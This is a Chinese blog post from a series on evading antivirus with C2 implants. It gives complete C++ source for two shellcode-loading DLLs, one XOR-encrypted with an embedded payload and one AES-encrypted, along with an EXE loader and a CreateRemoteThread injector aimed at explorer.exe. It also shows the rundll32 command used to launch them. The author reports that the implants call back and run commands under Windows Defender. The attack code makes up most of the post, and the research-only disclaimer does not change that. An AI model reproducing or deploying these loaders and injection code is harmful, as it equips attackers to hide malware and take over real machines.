【免杀】C2免杀技术(十)DLL注入-前置篇补充

admin
admin
admin
141766
文章
117
评论
2025年5月27日15:33:52评论1 views字数 15433阅读51分26秒阅读模式
一、rundll32.exe运行dll代码

rundll32.exe 是 Windows 提供的一个系统程序,专门用于调用 DLL 文件中导出的函数。 

1、首先写一个能用rundll32运行的加载shellcode上线的DLL代码,一定要加上调试代码!

为了让rundll32.exe成功运行你的DLL,该DLL必须满足下面两点:

①必须导出一个函数,函数名不能被C++修饰(即必须extern"C"),并且符合签名;

②不能使用DllMain作为主逻辑,rundll32不会自动执行你在DllMain中的恶意代码,必须通过导出的函数触发。

#include<windows.h>#include<iostream>#pragma comment(lib, "user32.lib")unsigned char xor_key[] = { 'k','u','n' };size_t xor_key_len = sizeof(xor_key);// 请替换为你的真实 shellcodeunsigned char encrypted_shellcode[] = "x97x3dxedx8fx85x86xa3x75x6ex6bx34x3fx2ax25x3cx3ax23x26x5axa7x0bx23xfex3cx0bx3dxe5x39x6dx26xe0x27x4ex23xfex1cx3bx3dx61xdcx3fx24x26x44xa7x23x44xaexc7x49x0fx17x77x42x4bx34xafxa2x78x2fx6axb4x8cx86x27x2fx3ax3dxe5x39x55xe5x29x49x26x6axa5x08xeax0dx76x60x77x1bx19xfexeexe3x75x6ex6bx3dxebxabx01x09x23x74xbex3bxfex26x73x31xe5x2bx55x27x6axa5x8dx3dx3dx91xa2x34xe5x5fxfdx26x6axa3x23x5axbcx26x5axb5xc2x2axb4xa7x66x34x6fxaax4dx8ex1ex84x22x68x39x4ax63x30x57xbax00xb6x33x31xe5x2bx51x27x6axa5x08x2axfex62x23x31xe5x2bx69x27x6axa5x2fxe0x71xe6x23x74xbex2ax2dx2fx33x2bx37x31x34x36x2ax2cx2fx31x3dxedx87x55x2fx39x8ax8ex33x34x37x31x3dxe5x79x9cx21x94x8ax91x36x1fx6ex22xcbx19x02x1bx07x05x10x1ax6bx34x38x22xfcx88x27xfcx9fx2axcfx22x1cx53x69x94xa0x26x5axbcx26x5axa7x23x5axb5x23x5axbcx2fx3bx34x3ex2axcfx54x3dx0cxc9x94xa0x85x18x2fx26xe2xb4x2fxd3x28x7fx6bx75x23x5axbcx2fx3ax34x3fx01x76x2fx3ax34xd4x3cxfcxf1xadx8axbbx80x2cx35x23xfcxafx23x44xbcx22xfcxb6x26x44xa7x39x1dx6ex69x35xeax39x27x2fxd1x9ex3bx45x4ex91xbex3dxe7xadx3dxedxa8x25x04x61x2ax26xe2x84x26xe2xafx27xacxb5x91x94x8ax91x26x44xa7x39x27x2fxd1x58x68x73x0ex91xbexf0xaex64xf0xf3x6ax75x6ex23x8axa1x64xf1xe2x6ax75x6ex80xa6x87x8fx74x6ex6bx9dxccx94x8ax91x44x1fx2fx27x13x6ex29xfbx4cx87x7cx4exa3x5ax27x7ex12x9bxe1xb6xcbx0dx98x9ex71x24xf0xbbx35xe9x45x21xf4x5fx7fx0cx90xf4x74xe8x6axb2xb5x4fx8cxf6xd6x9ex51xdfx81xaex76x30x26xddxbdx75x63x41xc0x67x3cx70xd5xf5x79xadx41x9fxc5xa7x6axfdx58x20xbdxafx8cx75x3bx18x10x1cx46x34x09x0ex1bx1ax51x55x23x04x0fx07x07x19x0fx44x40x40x5bx55x46x08x1ax03x1bx14x1ax02x17x02x0ex4ex4ex26x26x27x2ex55x5fx5bx5bx5ex50x55x39x02x1bx0ax04x02x1dx4bx3bx3ax4bx43x40x5ax4ex4ex3cx3ax39x5dx41x55x4bx21x1cx02x11x0bx05x01x41x5dx5bx5ex42x78x64x6bx43xacxbcx37xdfx7bx58xffx31x6fx96x46xfex4fx38xd0xe3xf3xfbx3cx0cx3ax75x82x1cxf1xd9x1dxd2x49x6bx9ax46x25x9exafx69x9ax83x12xf0x10xb9x26x75x0ax1axaex03x61x24x6fx4bxe9xe7xcdx58xf4xbex95xd0x46x3fx7bx37x76xc8x0bx35x3bx9ax2bxaaxd5x1cxafx4bx35xdax25x9ax69x5cx0fxd4x0cx3bxbax3dxd2xf0xb9x6axcdx8fx81xe2x9ex52xebx6dx1ex61x25x5cx1exc4x0fx0ex1fxa3x88x22x5bx62x3exc1xeexd7x8cx43xf1x25x90xf4x7dxbbxbcxc7x7ex9dx83xfaxffx9dxbfx51x9fx76x7axb2xc7xa7xa0x6cxddxddxe8x55xc9xb7xdaxa1xfexd5x9dx0exabx49xb9x06x93xacx62x68xd6xd4x0bx75x17x50x9fx02x8fx7bx0dx47x97xc7x5dxc6x34x43x86x20xc3x5fx4exd5x64x83x5dx7fx55x6bx69x3ex7fx99x02x4fxa4x1bxa1x0ex07x03x54x1dxf2xe1x04x4dxa8x36xd3x09x6ex2axcbx9exdexd7x38x94xa0x26x5axbcxd4x6bx75x2ex6bx34xd6x6bx65x6ex6bx34xd7x2bx75x6ex6bx34xd4x33xd1x3dx8ex8axbbx23xe6x3dx38x3dxe7x8cx3dxe7x9ax3dxe7xb1x34xd6x6bx55x6ex6bx3cxe7x92x34xd4x79xe3xe7x89x8axbbx23xf6xaax4bxf0xaex1fxc3x08xe0x72x26x6axb6xebxabx00xb9x33x2dx36x23x70x6ex6bx75x6ex3bxb6x86xf4x88x91x94x44x57x59x5bx5fx5dx4dx40x59x40x5bx45x44x6ex6bx7fx42x41";size_t encrypted_len = sizeof(encrypted_shellcode);voidDecryptShellcode(unsignedchar* data, size_t len){    for (size_t i = 0; i < len; ++i) {        data[i] ^= xor_key[i % xor_key_len];    }}DWORD WINAPI RunShellcode(LPVOID){    MessageBoxA(NULL"Thread started""Debug", MB_OK);    unsigned char* shellcode = (unsigned char*)VirtualAlloc(NULL, encrypted_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    if (!shellcode) {        MessageBoxA(NULL"VirtualAlloc failed""Error", MB_OK);        return 1;    }    memcpy(shellcode, encrypted_shellcode, encrypted_len);    MessageBoxA(NULL"Shellcode copied""Debug", MB_OK);    DecryptShellcode(shellcode, encrypted_len);    MessageBoxA(NULL"Shellcode decrypted""Debug", MB_OK);    // 直接调用 shellcode 并挂住主线程,避免提前退出    ((void(*)())shellcode)();    MessageBoxA(NULL"Shellcode finished (unexpected!)""Debug", MB_OK);    SecureZeroMemory(shellcode, encrypted_len);    VirtualFree(shellcode, 0, MEM_RELEASE);    return 0;}extern "C" __declspec(dllexport) void CALLBACK Start(LPWSTR lpCmdLine, DWORD nCmdShow){    MessageBoxA(NULL"Start() called""Debug", MB_OK);    HANDLE hThread = CreateThread(NULL0, RunShellcode, NULL0NULL);    if (hThread == NULL) {        MessageBoxA(NULL"CreateThread failed""Error", MB_OK);    }    else {        WaitForSingleObject(hThread, INFINITE); // 避免主线程提前退出        CloseHandle(hThread);    }}// =========== 标准 DllMain ===========BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved){    if (fdwReason == DLL_PROCESS_ATTACH) {        DisableThreadLibraryCalls(hinstDLL);  // 减少不必要的通知    }    return TRUE;}

2、编译

首先,位数一定要匹配。因此编译时也选64位

【免杀】C2免杀技术(十)DLL注入-前置篇补充

其次,用VS创建DLL项目时,默认会有固定的头文件。这里可以取消掉

【免杀】C2免杀技术(十)DLL注入-前置篇补充

3、使用如下命令运行dll

rundll32.exe qiuhuiDLL2.dll,Start#rundll32.exe <DLL路径>,<导出函数名>

成功上线!

【免杀】C2免杀技术(十)DLL注入-前置篇补充
二、写exe调用dll

这是开发测试阶段常用的方式

1、重新写一个加载shellcode上线的DLL,这次改用aes

// dllmain.cpp#include<windows.h>#include<wincrypt.h>#include<iostream>#pragma comment(lib, "advapi32.lib")#pragma comment(lib, "user32.lib")// ===== AES Key & IV(必须与 Python 加密一致)=====BYTE aesKey[16] = {   // 自己的key};BYTE aesIV[16] = {   // 自己的IV};// ===== 你用 AES 加密后的 shellcode(示例)=====unsigned char encrypted_shellcode[] = {    0xf50x1f0xd70x500xfb0x8f0x8e0xe80xe30x400x260xae0x930xf20x7a0xce0x070xd60x650x990x4a0xa40x870xf10x2f0xf40x000x800x520x160x6d0x2b0x440x010xcd0x350xac0xd70xa60x450x2a0x3a0x590x710xf30x1c0x510x860x380xf50x6b0x3b0x920xfc0xfd0x1e0x0f0x9c0x4e0x640x140x3b0xd20xfd0xfa0xa60xb10x170x780xcc0xe90x310xce0xa00xce0x0b0x240x2a0x680x1d0xd50x440x800x8a0xb60xf80xe80x8f0x440xc70x4d0x1b0x9d0xaf0x910x320xa10x3a0x1f0xda0xeb0xb90xf90x5e0x010x740x250xb70x130x610x500xc90x470x210x2a0x520x9b0x6a0x920x170x7f0xd40x9e0xf40x230x120x5e0x200x140x5d0xf70xa90x0b0x250xfb0xd00x520xec0xe50x8d0x020xbf0xff0x2b0x890xa60x1f0x560x140xed0x420x680xcf0xdd0x380x940x770xd60xf40xc30x3e0xdf0xd90x1d0xdf0x390xcd0x520x5c0xff0x8c0x850x170xec0x340xfc0x1f0xb30xbe0xf40xa50x630x6b0x150x1b0xf00x2a0xd20x5a0xe10xac0x310x670xd10x2e0x730x150x9e0x2f0xb90xd90xf70xa90x570xa60xa70x580x160x070x500x1a0x6b0xd30xa10xbc0x5b0xef0xbb0xe60x710x150xfa0xb50x110x9b0x8f0x4a0x520x120x600x100x270x350x270xde0x4b0xaa0xac0x600x190x480x9e0x8d0x910xeb0xa30xc60x7c0xb90xf90xbd0xb10xea0xe20x440x990x310xa60xc70xb20xa60xa90x3d0xee0xd00xbf0x060x9f0x7b0xae0xc20xf60x6a0x540x5d0xac0x520xd00xb40x930x0e0xfa0x2b0x550xe40x740x2d0xc50x650x590xdd0xf70xeb0xa00x1a0xd10x070x040x030xe10x370x370x0d0xc40x1b0xb70x5b0xd90xd10xae0x9d0xe90x500x6e0xef0xd00xb50xe50x860xc00x2e0x900xc70xbb0xc70x000x570xd60x8a0xd90xbf0xa90x560x520x9b0x7e0x5a0x8d0x8c0x830xdb0x4e0x8b0xc60x4a0xb90xe20x5e0x750x4c0x8c0x8c0x0f0x680x4f0x1c0x880x7e0xbd0xb60x980x560xc40x4b0x550x810x5f0xaf0xa70x0e0xcd0x250xa20x240x410x1d0xa20xac0x890x6a0x200xa90x550x1f0x260x290x6c0x870x1c0xc30x0a0x4d0x490xf20x4e0x900xfa0x9e0x900xba0xd50xf50x8d0x760x070xad0x2f0x010xb90x540xde0xf50x000x000x340xbb0x2b0x860x3d0xd00x5c0x1d0xb20x960x0a0x5f0x830x8b0x740xe90xcc0xe60x740x7e0xe70xd80xd50xad0x970xe10x490x4d0x040xda0xa80x900xbb0x010xbc0x8b0x4d0xa20x8f0xdc0x4a0x860xc40xae0xa20x690xce0xde0x4c0xba0x920x820x770x880xeb0x550x190x4e0xb30xa10x8a0x870x1e0xd10xb40x520x6b0x300xb80xa00x5c0x770x400xc10x200x450x430x480x100xd90x6c0xfb0x290xe40x4c0x2e0xfb0xdc0x070x850x8d0x840xde0x8f0x300x340x520x1c0xc50xe50x840xe00x900x8d0x5f0x250x8a0x400x860x1c0x2b0xb40x690xea0xf40x760x250x3b0x690x770xa60x980xdc0x5a0x750x480xac0xc90xbf0xa80x4c0xcb0x990x4c0x530x970x7d0xd90xdf0x040xcc0x490xbd0x480x730xee0x7f0xa90x470x400xf80x3a0xde0x1a0xc10x8f0x340x8b0x170x910x4a0xf10xbd0xd90xb90x040xa80x0b0x0d0x2b0x1e0xfb0x8c0xf90x6d0x370x790x710xbb0x560x270xa00x930xe80xaf0x210x2e0xbf0x000xb00xcb0x130x290x6d0x330x600xda0x110xf50xf90x5c0x4d0xd50x280x740x970x2c0x570xb00x130x870xf90x4a0xd20xdd0xd20x780x3a0xe90x7e0xda0x750x910xdf0x1f0xb40xcd0x2f0x500xf90x730xee0xb10x9d0x2e0x7f0x0f0xce0x090x2e0x480x960x970x8d0x4f0x880xf30xe60x6d0xa50xeb0xde0xee0x810xf60xab0xdb0xb50xeb0x6b0x040x480x5e0x900x0e0x390x040xa50xe30xa90x850x920xc00x820x0d0x170xfd0x020x620xa60xed0xba0xf90xf40xa70x900xd60xb10x450x000xba0x110x180xcd0x4b0xaa0xea0x770xad0x570x0e0xb80x300x210xa70x4a0x000xb10xd40x080x400xe20x960x5a0xef0x750x710x5e0x4f0x7e0x550x5f0x9c0x2d0x690xbf0x740x680xad0x940xfd0x8b0xf20x030xd20xc60x880xe40x820x450x800xf40x690x700x500x970x590xd20xf00xd40x8b0xba0x190x2c0x100x3a0x1e0xb00xeb0x9c0x0e0xc80x320xb90x200x710x310x2f0xad0x360xb40xc00x4b0xb80xa20x070x160xff0xd60x110x220xfb0xfb0xfe0xbf0xa80xf00x3a0xfa0xec0xee0xd60x690x2a0x0b0x090x570x420xe90x9d0x140x930xcc0x3b0xbc0x5b0x600xc20x110x1a0x7a0x5a0x0c0x970xa40x4d0x980x9e0x570x9a0x430x7f0xae0x870x2b0xeb0x930x8c0x280xe20xc70x100xcb0xec0x5f0xfb0xa40x4a0x460x4f0x3c0x260x3c0xa20xe20x8a0x530xc00x840xd40xd80x950xef0xdc0x260x630x470x510x170xf40xb80x8f0xe90xfe0xaf0xdb0xbd0xe40x810xf70x8a0x790xcc0x370xba0xcf0x030x710x1a0xf80xe30x88};size_t encrypted_len = sizeof(encrypted_shellcode);// ===== 解密函数(AES-128-CBC)=====BOOL DecryptShellcode(BYTE* encData, DWORD encLen, BYTE** outData, DWORD* outLen) {    HCRYPTPROV hProv = 0;    HCRYPTKEY hKey = 0;    BOOL success = FALSE;    *outData = NULL;    *outLen = 0;    // 构造明文密钥Blob    BYTE keyBlob[sizeof(BLOBHEADER) + sizeof(DWORD) + 16] = { 0 };    BLOBHEADER* blobHeader = (BLOBHEADER*)keyBlob;    blobHeader->bType = PLAINTEXTKEYBLOB;    blobHeader->bVersion = CUR_BLOB_VERSION;    blobHeader->reserved = 0;    blobHeader->aiKeyAlg = CALG_AES_128;    *(DWORD*)(keyBlob + sizeof(BLOBHEADER)) = 16;    memcpy(keyBlob + sizeof(BLOBHEADER) + sizeof(DWORD), aesKey, 16);    BYTE* buf = (BYTE*)malloc(encLen);    if (!buf) return FALSE;    memcpy(buf, encData, encLen);    do {        if (!CryptAcquireContext(&hProv, NULLNULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) break;        if (!CryptImportKey(hProv, keyBlob, sizeof(keyBlob), 00, &hKey)) break;        if (!CryptSetKeyParam(hKey, KP_IV, aesIV, 0)) break;        DWORD bufLen = encLen;        if (!CryptDecrypt(hKey, 0TRUE0, buf, &bufLen)) break;        *outData = buf;        *outLen = bufLen;        success = TRUE;    } while (0);    if (!success && buf) free(buf);    if (hKey) CryptDestroyKey(hKey);    if (hProv) CryptReleaseContext(hProv, 0);    return success;}// ===== shellcode 执行函数 =====DWORD WINAPI RunShellcode(LPVOID) {    BYTE* shellcode = NULL;    DWORD shellcodeLen = 0;    if (!DecryptShellcode(encrypted_shellcode, encrypted_len, &shellcode, &shellcodeLen)) {        MessageBoxA(NULL"AES 解密失败""错误", MB_OK);        return 1;    }    void* exec = VirtualAlloc(NULL, shellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    if (!exec) return 2;    memcpy(exec, shellcode, shellcodeLen);    SecureZeroMemory(shellcode, shellcodeLen);    free(shellcode);    ((void(*)())exec)(); // 执行 shellcode    return 0;}// ===== DLL 自动执行点 =====BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {    if (fdwReason == DLL_PROCESS_ATTACH) {        DisableThreadLibraryCalls(hinstDLL);        CreateThread(NULL0, RunShellcode, NULL0NULL);    }    return TRUE;}

2、写一个exe加载器

#include<windows.h>#include<iostream>intwmain(int argc, wchar_t* argv[]){    if (argc != 2) {        std::wcout << L"用法: LoadDll.exe <完整DLL路径>" << std::endl;        return 1;    }    const wchar_t* dllPath = argv[1];    std::wcout << L"正在尝试加载 DLL: " << dllPath << std::endl;    HMODULE hMod = LoadLibraryW(dllPath);    if (hMod == NULL) {        DWORD err = GetLastError();        std::wcerr << L"LoadLibraryW 失败,错误码: " << err << std::endl;        return 1;    }    std::wcout << L"DLL 加载成功!模块句柄: " << hMod << std::endl;    // 可选:等待手动关闭,以便观察效果    std::wcout << L"按任意键退出..." << std::endl;    std::wcin.get();    // 卸载 DLL(可选)    FreeLibrary(hMod);    return 0;}

3、两者编译出来,放到DF上执行,成功上线!

【免杀】C2免杀技术(十)DLL注入-前置篇补充
三、远程线程注入dll

如果说上面两种是DLL代码的运行方式,那么这个就是DLL代码的注入方式。可以说是DLL注入手段里面最基本,最常见的方式

1、由于刚才已经拥有DLL,这里再写一个远程注入的注入器即可

#include<windows.h>#include<tlhelp32.h>#include<tchar.h>#include<iostream>// 用进程名查找目标进程 PIDDWORD FindProcessId(const std::wstring& processName){    PROCESSENTRY32W pe32 = { 0 };    pe32.dwSize = sizeof(PROCESSENTRY32W);    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if (hSnapshot == INVALID_HANDLE_VALUE) return 0;    if (Process32FirstW(hSnapshot, &pe32)) {        do {            if (!_wcsicmp(pe32.szExeFile, processName.c_str())) {                CloseHandle(hSnapshot);                return pe32.th32ProcessID;            }        } while (Process32NextW(hSnapshot, &pe32));    }    CloseHandle(hSnapshot);    return 0;}intmain(){    const wchar_t* targetProcess = L"explorer.exe";  // 🟡 你可以改成目标进程名    const char* dllPath = "C:\Users\Defender\Desktop\qiuhuiDLL.dll"// 🟥 修改为你DLL的绝对路径    DWORD pid = FindProcessId(targetProcess);    if (pid == 0) {        std::cout << "未找到目标进程n";        return 1;    }    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);    if (!hProcess) {        std::cout << "打开目标进程失败n";        return 1;    }    size_t pathLen = strlen(dllPath) + 1;    LPVOID remoteBuf = VirtualAllocEx(hProcess, nullptr, pathLen, MEM_COMMIT, PAGE_READWRITE);    if (!remoteBuf) {        std::cout << "内存分配失败n";        CloseHandle(hProcess);        return 1;    }    BOOL written = WriteProcessMemory(hProcess, remoteBuf, dllPath, pathLen, nullptr);    if (!written) {        std::cout << "写入内存失败n";        VirtualFreeEx(hProcess, remoteBuf, 0, MEM_RELEASE);        CloseHandle(hProcess);        return 1;    }    // 获取 LoadLibraryA 函数地址(本地)    LPVOID loadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");    if (!loadLibAddr) {        std::cout << "获取 LoadLibraryA 地址失败n";        return 1;    }    // 创建远程线程执行 LoadLibraryA(dllPath)    HANDLE hThread = CreateRemoteThread(hProcess, nullptr0,        (LPTHREAD_START_ROUTINE)loadLibAddr, remoteBuf, 0nullptr);    if (!hThread) {        std::cout << "创建远程线程失败n";        VirtualFreeEx(hProcess, remoteBuf, 0, MEM_RELEASE);        CloseHandle(hProcess);        return 1;    }    std::cout << "注入成功,等待远程线程结束...n";    WaitForSingleObject(hThread, INFINITE);    VirtualFreeEx(hProcess, remoteBuf, 0, MEM_RELEASE);    CloseHandle(hThread);    CloseHandle(hProcess);    return 0;}

 2、编译出来,放到DF上,直接双击。上线之后立马被干!

【免杀】C2免杀技术(十)DLL注入-前置篇补充

后续稍微处理一下,成功上线执行命令

【免杀】C2免杀技术(十)DLL注入-前置篇补充

#免杀 #C2 #DLL注入 #shellcode加载器 #钓鱼 #DLL加载 #CS

原文始发于微信公众号(仇辉攻防):【免杀】C2免杀技术(十)DLL注入-前置篇补充

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月27日15:33:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀】C2免杀技术(十)DLL注入-前置篇补充https://cn-sec.com/archives/4101855.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息